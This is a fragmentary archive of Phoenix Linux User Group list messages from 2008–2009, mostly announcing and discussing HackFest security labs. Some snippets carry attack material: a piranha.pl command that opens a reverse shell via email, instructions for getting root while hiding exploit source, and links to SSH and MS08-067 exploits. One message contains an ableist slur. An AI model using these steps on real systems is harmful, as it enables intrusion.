: Re: {Disarmed} FW: Kristy Westphal's Forensic Presentation from
January Hackfest
From: craigwh...@azapple.com
To: plug-discuss@lists.plug.phoenix.az.us
Date: Tue, 13 Jan 2009 12:15:13 -0700
On Tue, 2009-01-13 at 17:13 +, Lisa Kachold wrote:
I am attempting to compress a raw dvd
On Wed, 2009-01-14 at 00:12 +, Lisa Kachold wrote:
Yes, I built it fine.
I was just using a RAW Sony DVD camera format with sound without using
the sound codec options.
that's why I sent the script that I have used in the past
Craig
Hackfest
From: craigwh...@azapple.com
To: plug-discuss@lists.plug.phoenix.az.us
Date: Tue, 13 Jan 2009 17:21:55 -0700
On Wed, 2009-01-14 at 00:12 +, Lisa Kachold wrote:
Yes, I built it fine.
I was just using a RAW Sony DVD camera format with sound without using
the sound codec
On Wed, 2009-01-14 at 00:26 +, Lisa Kachold wrote:
http://www.theonion.com/content/node/40076
Google Purge...sounds anorexic
they would of course name it something like GPurge or why not just Gcab
in honor of that which truly has little to no value.
Craig
bulemic not anorexic... anorexic would be lycos
On Tue, Jan 13, 2009 at 5:31 PM, Craig White craigwh...@azapple.com wrote:
On Wed, 2009-01-14 at 00:26 +, Lisa Kachold wrote:
http://www.theonion.com/content/node/40076
Google Purge...sounds anorexic
they would of course name it
http://www.theonion.com/content/node/47978
--- On Tue, 1/13/09, Lisa Kachold lisakach...@obnosis.com wrote:
From: Lisa Kachold lisakach...@obnosis.com
Subject: OT: {Disarmed} FW: Kristy Westphal's Forensic Presentation from
January Hackfest
To: plug-discuss
Touché - lycos...are they still in business? I thought they bit the
dust...perhaps someone picked up the name.
Craig
On Tue, 2009-01-13 at 17:33 -0700, Stephen wrote:
bulemic not anorexic... anorexic would be lycos
On Tue, Jan 13, 2009 at 5:31 PM, Craig White craigwh...@azapple.com wrote:
110mb.com lost a drive today or deleted my site(s) due to too much traffic or
flooding (pro Anonymous anti-scientology wiki entry).
So if you are having difficulties getting the presentation materials, please
email me and I will arrange access.
www.Obnosis.com | http://wiki.obnosis.com |
Please REGISTER for January HackFest at UAT HERE:
http://obnosis.110mb.com/hackfest/?q=node/6
Registration for HackFest labs will include the standard disclaimer, allow us
to promote social responsibility and glee for knowledge rather than criminal
thinking, while also allowing us to do
1) OpenSSL malformed signature checking:
http://openssl.org/news/secadv_20090107.txt
This effects a great number of products and installations.
Who is affected?
=
Everyone using OpenSSL releases prior to 0.9.8j as an SSL/TLS client
when connecting to a server whose certificate
/CivilDisobedience.html
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
--
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
Forensics @ UAT 1/10/09 12-3PM
in communist Russia.
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
Forensics @ UAT 1/10/09 12-3PM
Date: Sun, 4 Jan 2009 12:34:47 -0800
From: klsmith2...@yahoo.com
Subject: RE: OT
?
*http://sunsite.berkeley.edu/Literature/Thoreau/CivilDisobedience.html
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
Forensics @ UAT 1/10/09 12-3PM
a ticket and a collection agency send you a notice to pay up.
Keith Smith
--- On Sat, 1/3/09, Lisa Kachold lisakach...@obnosis.com wrote:
From: Lisa Kachold lisakach...@obnosis.com
Subject: OT: HackFest Series - Radar Obedience
To: plug-discuss@lists.plug.phoenix.az.us
is to educate. Each Nix user must understand
the risks before implementing any protocol. LDAP can make your network
more secure when properly implemented.
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department
cryptworks are you coming to the next Fest at UAT?
Once you get setup let me know, okay? Thanks for the offer to help.
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
hackfest.obnosis.com (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic
trick
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
hackfest.obnosis.com (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux XP/Vista BackTrack3] Pill leave SecurityMatrix, or take
No vanishing at all (default)
1Multipart/alternative trick
2img src=image.JPG width=0 height=0 trick
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
hackfest.obnosis.com (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic
cryptworks said:
Date: Thu, 25 Dec 2008 13:03:10 -0700
From: cryptwo...@gmail.com
To: plug-discuss@lists.plug.phoenix.az.us
Subject: Re: HackFest Series: Email Christmas Cheer
That's twisted but funny
It's my job to educate ALL as we happily anesthetize each other (and Noob Linux
More the timing than anything
On 12/25/08, Lisa Kachold lisakach...@obnosis.com wrote:
cryptworks said:
Date: Thu, 25 Dec 2008 13:03:10 -0700
From: cryptwo...@gmail.com
To: plug-discuss@lists.plug.phoenix.az.us
Subject: Re: HackFest Series: Email Christmas Cheer
That's twisted but funny
://en.wiktionary.org/wiki/Citations:obnosis |
hackfest.obnosis.com (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux BT3] Pill leave SecurityMatrix, or take the Blue
[XP/Vista Pill] stay happily ignorant
I would be happy to house a honeypot
On Mon, 2008-12-22 at 23:20 +, Lisa Kachold wrote:
We need more people willing to build and man honeypots, IDS and complete
forensics post fest! The challenge is to find all the attack vectors and
prove encroachment via logs ad loggers for
Actually, we mostly need people willing to man the DEFENSE (and forensics) side
of the HackFest.
We have more than a few who a unstoppable with exploit tech, so we need the
important part which consists of:
1) honeypots
2) keyloggers
3) IDS [snort tiger and tripwire]
to give us a full report
hosting a wordpress blog and a few other toys -- but I would
just rather have it that way and not have to worry about cleaning kernel
rootkits out and such ;) ), I am on winter break right now and will have ample
time to do such things (maybe take part in a few hackfest series' as well)
If this ends
I have been wanting to biild up a machine, come jan I might have the
funds to get the last parts. Once up I might be willing to let
hackfest have a go before I run it live
On 12/22/08, Ryan Rix phrkonale...@gmail.com wrote:
On Monday 22 December 2008 4:20:01 pm Lisa Kachold wrote:
We need more
OR
$ ./grepfile2
It's a good idea to remove your .c source after building so that your directory
looks innocent like a $badguy would.
After your code runs, you should have a fine shell.
I was able to run the mysql example on the December HackFest Fedora Core 10
system successfully to obtain root
session, WE MUST Alert our
upstream and their SWIP'd provider with full logs of the exploit(s), including
date, time, and other information.
Thanks for the fun!
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
Catch the January PLUG HackFest! Kristy Westphal
a flag is obtained - notify IRC users and send email to
lisakach...@obnosis.com so JLaforge or Slofgren can verify it.
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
Catch the January PLUG HackFest! Kristy Westphal, CSO for the AZ Department
of Economic
and services on this system are fair game.
When a flag is obtained - notify IRC users and send email to
lisakach...@obnosis.com so JLaforge or Slofgren can verify it.
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
Catch the January PLUG HackFest! Kristy Westphal
None got root yet!
We are leaving the target up available at http://24.251.219.96:8088
It's still open for encroachment through the weekend!
HackFest results:
http://plug.phoenix.az.us/comment/edit/126
Kudos to:
PAVLOS KAIRIS TOOK the first SSH FLAG as nobody
RW who followed by getting
On Dec 11, 2008, at 8:25 PM, Lisa Kachold wrote:
It's just as easy to set the server hostname and ip address staticly
to a standard hosts file? Name based virtualhosting still works!
For 443 certificate based virtuals, you MUST have your SSL cert FQDN
match the csr, and crt.
Kinda.
without a
warrant]
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
Catch the January PLUG HackFest! Kristy Westphal, CSO for the AZ Department
of Economic
Security will provide a one hour
presentation on forensics 1/10/09 Noon at UAT.edu
PLUG Linux Security Network HackFest TOMORROW Noon -- 3PM
goodie goodie goodie
PLUG HackFest GOES virtual via hamachi tunnel network 15 users per network;
target will be attached to both networks
Hamachi HowTo
Here's how to install hamachi if you are confident that you can protect your
On Dec 10, 2008, at 12:27 PM, Lisa Kachold wrote:
Trust is the basis for all security.
The evil /etc/hosts file would look like this:
# /etc/hosts
127.0.0.1 hostname localhost localhost.localdomain
# end
A good /etc/hosts file appears:
# /etc/hosts
127.0.0.1 localhost
Catch the January PLUG HackFest! Kristy Westphal, CSO for the AZ Department
of Economic
Security will provide a one hour
presentation on forensics 1/10/09 Noon at UAT.edu.
From: a...@crackpot.org
To: plug-discuss@lists.plug.phoenix.az.us
Subject: Re: Linux HackFest Series: Evil /etc/hosts
Don't learn to Hack; HACK to LEARN!
Please accept this proud invitation to attend the Phoenix Linux User's Group
January HackFest.
HackFests are practical security labs held the second Saturday of each month
from Noon to 3PM in various formats including guest presentations.
In January, PLUG
would take. Even with WPA keys, Mac Address
connection controls are best deployed to provide added security in wireless
networks.
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
Catch the January PLUG HackFest
The PLUG December Linux Security HackFest is REMOTE New Targets will be
provided. PLUG IDS testors and team encroachers will have an opportunity to
demonstrate realtime system identification, tunneling and scanning via realtime
conditions using Internet while accessing an example server
://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona
Department of Economic
Security will provide a one hour
presentation on forensics.
Laugh at this MSN Footer
://www.lieffcabraser.com/itovertime.htm
Trojan Keyloggers:
http://www.youtube.com/watch?v=fVy82nFcvVg
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
Catch the January PLUG HackFest! Kristy Westphal, CSO
://www.urbandictionary.com/define.php?term=obnosis (503)754-4452Catch the
January PLUG HackFest! Kristy Westphal, CSO for the Arizona Department of
Economic
Security will provide a one hour
presentation on forensics.Laugh at this MSN Advertisement
PLUG HackFest! Kristy Westphal, CSO for the Arizona
Department of Economic
Security will provide a one hour
presentation on forensics.
Laugh at this MSN Footer:
_
Windows Live Hotmail now works up to 70% faster.
http
://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona
Department of Economic
Security will provide a one hour
presentation on forensics.
_
Color coding
the January PLUG HackFest! Kristy Westphal, CSO for the Arizona
Department of Economic Security will provide a one hour presentation on
forensics.
--
Color coding for safety: Windows Live Hotmail alerts you to suspicious
email. Sign up
today.http://windowslive.com
Our network packet analysis from the last HackFest indicates that I was
actively included as a target.
I found this an excellent idea and will include myself as a target in all
future HackFests.
Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
http
We will be taking December's HackFest to remote networking via Hamaci with
various remote chat/camera room tools.
As usual, targets and new presentation material will be provided (along with
STRONG hints).
Again this is a not a hacking demonstration. No-one is going to teach you
how
Is your mail server secure?
Test it!
Piranha.pl example: Connect back with a reverse shell just by sending an email
using Viagra cloaking.
$ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a [EMAIL
PROTECTED]
Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]
Mandatory
Congratulations to the team (Joseph Ruix Michael Jones) who captured the
first flag at Estrellamountain.edu on Saturday, employing Lab 1 SSH dictionary
attack via Hydra to take the web server!
Extra credit for taking the tag to the next step by running X11 forwarded root
SSH, and Firefox to
This month, the HackFest has been moved to Estrella Mountain to take
advantage of a generous offer from Randol L. Larson to use their Lab
facilities.
Detailed Directions http://lug.estrellamountain.edu/news/
Joey Prestia ([EMAIL PROTECTED]) will be supporting the PLUG FEST, as we
delve
Hey!
I wish I had more of a chance to talk with you.
The demonstration aspect of these fests makes me forget everything for some
reason.
Laugh! Everyone seems to want me to put on a demonstration!
Thanks for your assistance.
There's a big fight over the HackFest evidently - yuk.
I am
Hamachi is a remote access network access tool available on BackTrack.
Are you unable to attend all of the Fests?
Instructions for using Hamachi for remote access BackTrack networking for
HackFest Labs:
Submitted by: J. LaforgeS. Lofgren
Backtrack (livecd or USB) Hamachi setup:
modprobe
2008 20:17:23 -0700
From: [EMAIL PROTECTED]
To: plug-discuss@lists.plug.phoenix.az.us
Subject: Re: HackFest Series: NOVEMBER HackFest At ESTRELLA MOUNTAIN on
November 15, 2008 Noon Until 3:30 BRING YOUR LIVE SECURITY CD's!
This is by far the ugliest email I have ever received
Lisa
--
Date: Thu, 13 Nov 2008 20:17:23 -0700
From: [EMAIL PROTECTED]
To: plug-discuss@lists.plug.phoenix.az.us
Subject: Re: HackFest Series: NOVEMBER HackFest At ESTRELLA MOUNTAIN on
November 15, 2008 Noon Until 3:30 BRING YOUR LIVE SECURITY CD's!
This is by far the ugliest
PROTECTED]
To: plug-discuss@lists.plug.phoenix.az.us
Subject: Re: OT: Live.com (Was Hackfest series: NOVEMBER HACKFEST(...))
Hi,
I was always under the impression that if you used a dedicated client (as
oppsed to webmail) it couldn't add the signitures. Or does the server add them
when they go
This month, the HackFest has been moved to Estrella Mountain to take advantage
of a generous offer from Randol L. Larson to use their Lab facilities.
http://www.estrellamountain.edu
Joey Prestia ([EMAIL PROTECTED]) will be supporting the PLUG FEST, as we delve
into the exciting area
Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis
|http://www.urbandictionary.com/define.php?term=obnosis
(503)754-4452From:
[EMAIL PROTECTED]: [EMAIL PROTECTED]: HackFest Series: NOVEMBER HackFest At
ESTRELLA
This is by far the ugliest email I have ever received
Lisa Kachold wrote:
*snip*
_
Windows Live Hotmail now works up to 70% faster.
http://windowslive.com/Explore/Hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_faster_112008
This month, the HackFest has been moved to Estrella Mountain to take
advantage of a generous offer from Randol L. Larson to use their Lab
facilities.
Detailed Directions http://lug.estrellamountain.edu/news/
Joey Prestia ([EMAIL PROTECTED]) will be supporting the PLUG FEST, as we
delve
I should be there for this as well.
Sent from my android
On Nov 5, 2008 5:16 PM, Joey Prestia [EMAIL PROTECTED] wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Mike Schwartz wrote: | ((top posted because this thread | seemed to already
have that custom)) ...
The HackFest class lab
moin moin,
just a reminder that the Hackfest was moved on Monday and it will be a
week from tomorrow at Estrella Mountain Community College.
ciao,
der.hans
--
# http://www.LuftHans.com/http://www.LuftHans.com/Classes/
# Very frankly, I am opposed to people being programmed by others
The UAT people tried contacting me as if I was the first point of contact for
hackfest. I informed them of our decision.
der.hans [EMAIL PROTECTED] wrote:
moin moin,
just a reminder that the Hackfest was moved on Monday and it will be a
week from tomorrow at Estrella Mountain
Am 07. Nov, 2008 schwätzte [EMAIL PROTECTED] so:
The UAT people tried contacting me as if I was the first point of contact for
hackfest. I informed them of our decision.
Thank you.
ciao,
der.hans
--
# http://www.LuftHans.com/http://www.LuftHans.com/Classes/
# Magic is science
November 16th is a sunday iirc
On Nov 4, 2008 2:30 PM, Lisa Kachold [EMAIL PROTECTED] wrote:
This month, the HackFest has been moved to Estrella Mountain to take
advantage of a generous offer from Randol L. Larson to use their Lab
facilities.
http://www.estrellamountain.edu
Joey Prestia
Woops sorry the correct date is November 15th 12:00 to 3:00 pm
There is a map and details to Estrella Mountain C.C. here
http://lug.estrellamountain.edu/news/
Joey
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To
[EMAIL PROTECTED] wrote:
This month, the HackFest has been moved to Estrella Mountain to take
advantage of a generous offer from Randol L. Larson to use their Lab
facilities.
http://www.estrellamountain.edu
Joey Prestia ([EMAIL PROTECTED]) will be supporting the PLUG FEST, as we
delve
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Mike Schwartz wrote:
| ((top posted because this thread
| seemed to already have that custom))
|
| Sorry if this should have been an off-list reply
| to Lisa or someone.
The HackFest class lab is on the *15th* of November no sign up just show
up
I have to admit, Backtrack 3 is really nice.
I've never used anything more than a CD, but that sure helps.
The pretty background is soothing and creates a positive chi flow
which is necessary while cracking a WPA password. Well, it's either
that or peanut butter cups.
Thanks,
Dan Lund
To
Am 30. Okt, 2008 schwätzte Lisa Kachold so:
SSH buffer overflow exploit - season to taste:
http://www.milw0rm.org/exploits/6804
Looks like this one is exploiting after authenticating as root. I presume
the idea is that you could auth as someone else and still get root access.
my $user =
Wow. Thank you for posting this!
On Thu, Oct 30, 2008 at 7:54 PM, Lisa Kachold [EMAIL PROTECTED]wrote:
In this Lab, we are going to go over the incredibly simple creation of a
non-persistent bt toolset on a USB pendrive.
Pendrive Tool Building from Windows
[Vmware bt versions also exist,
Innoculation 101
Virus actions appear to comprise as much as 50% of all SMTP traffic -
indicating high rate for various bugs identified/quarenteen'd at major mail
providers:
Texas AM Statistics:
http://www.tamu.edu/network-services/smtp-relay/configs/stats/consolidated.html
Barracuda Central
Full Administrator access to any version of Windows via RPC (file sharing):
http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx
http://www.us-cert.gov/cas/techalerts/Verified October 23, 2008
RED FLAG WARNING: Exploiting Microsoft Systems is akin to tripping retarded
people.
Where's the BEef?
LAB 10 in PLUG HackFest Series
Instructions:
Boot into BackTrack KDE
From the Menu:
Left Corner KDE -- BackTrack --SetUp BEef
Enter a Password
A shell terminal will open:
**
BeEF Setup Complete!
The BeEF Interface
Be sure to use YOUR IP ADDRESS - not mine: See corrections below!
Version 1.1
Where's the BEef?
LAB 10 in PLUG HackFest Series
Instructions:
Boot into BackTrack KDE
From the Menu:
Left Corner KDE -- BackTrack --SetUp BEef
Enter a Password
A shell terminal will open
Many of us are constantly plagued with port knocking and script kiddies from
places like the Amazon Cloud.
With security issues, the procedural recommended post encroachment steps per
CERT are:
1) Remove the computer from your network (probably not workable if this is a
server) [use IPtables
See minor corrections:
also see DenyHosts
Many of us are constantly plagued with port knocking and script kiddies from
places like the Amazon Cloud.
With security issues, the procedural recommended post encroachment steps per
CERT are:
1) Remove the computer from your network (probably
Most of you should have been able to successfully boot the Obnosis BackTrack
LiveCD you picked up at UAT during the 10/11/08 HackFest using one of your
other computers by now?
Problems? Email me and I can assist...
Reference the updated HackFest Overview Presentation materials here:
http
Obnosis.com 10/11/2008 Presentation:
http://www.scribd.com/doc/6680231/Hack-Fest
http://wapedia.mobi/en/Obnosis || http://en.wiktionary.org/wiki/obnosis |
Obnosis.com (503)754-4452
_
Want to do more with Windows Live? Learn
You can use a Fedora Core or Ubuntu LiveCD with the new persistence via USB key
options. If you like you can hand install whatever security tools you want!
A LiveCD for security labs is generally just for network and linux security
professional use to protect your regular distro and allow
If anyone would like the presentation materials from the HackFest at UAT on
10/11/08, please email me directly off list (list scrapes attachments).
There are 7 labs with reference materials that are pretty interesting!
http://wapedia.mobi/en/Obnosis || http://en.wiktionary.org/wiki/obnosis
: Re: HackFest Series: Presentation from UAT 10/11/08
Hey Lisa,
I would love the materials and to know if they're ever going to do it again.
Thanks,
Brian
On Mon, Oct 13, 2008 at 6:56 PM, Lisa Kachold [EMAIL PROTECTED] wrote:
If anyone would like the presentation materials from
Linux Security HackFest Lab
Saturday October 11, 2006 Noon until 3ish
UAT: http://www.uat.edu
Focus: Knoppix STD ISO Live CD*
Includes Backtrack Live CD*
Agenda: Starts at Noon
1) Short Presentation: OSI Layered Linux Security [OpenOffice Presentation
Available for Download if you Arrive
Linux Security HackFest Lab
Saturday October 11, 2006 Noon until 3-ish
Focus: Knoppix STD ISO Live CD
Agenda: Starts at Noon
1) Short Presentation: OSI Layered Linux Security [OpenOffice Presentation
Available for Download if you Arrive Late]
2) Knoppix STD OverView http://www.knoppix
I would sure like to come to this... Money is just not showing itself right
now, and that is way too far to drive! Hope you guys have a good time!
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to
Well, you have until October 11, 2008 - perhaps some others will carpool!
Where do you live?
(503)754-4452 Blackberry || Obnosis.com
From: [EMAIL PROTECTED]
To: plug-discuss@lists.plug.phoenix.az.us
Subject: Re: Linux HackFest Flyer in Time for AbleConf
Date: Fri, 19 Sep 2008 20:02:10
Count me in as well!
---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
I am interested in attending this, but will depend on the date in September.
--Gnunixguy
On Thu, Jul 24, 2008 at 10:37 AM, Rhune Lord [EMAIL PROTECTED] wrote:
Count me in and I will bring everything I have and another Kubuntu
user as well but she's not on this list.
Thanks to Hans, Lisa,
We are planning a PLUG Linux Security Lab - which has been loosely deemed a
HackFest after the very successful InstallFests.
The focus will be Linux Security in a lab or practicum format. This will
therefore NOT be a demonstration; our space is limited, so we just want people
interested
opportunity for the many respectable old timers we have here to put us
youngsters in our place! ;-)
On Wed, Jul 23, 2008 at 11:32 AM, Lisa Kachold [EMAIL PROTECTED]
wrote:
We are planning a PLUG Linux Security Lab - which has been loosely deemed
a HackFest after the very successful InstallFests
to drop in to say you can count me in
[...]
On Wed, Jul 23, 2008 at 11:32 AM, Lisa Kachold [EMAIL PROTECTED]
wrote:
We are planning a PLUG Linux Security Lab - which has been loosely deemed
a HackFest after the very successful InstallFests
301 - 389 of 389 matches
Mail list logo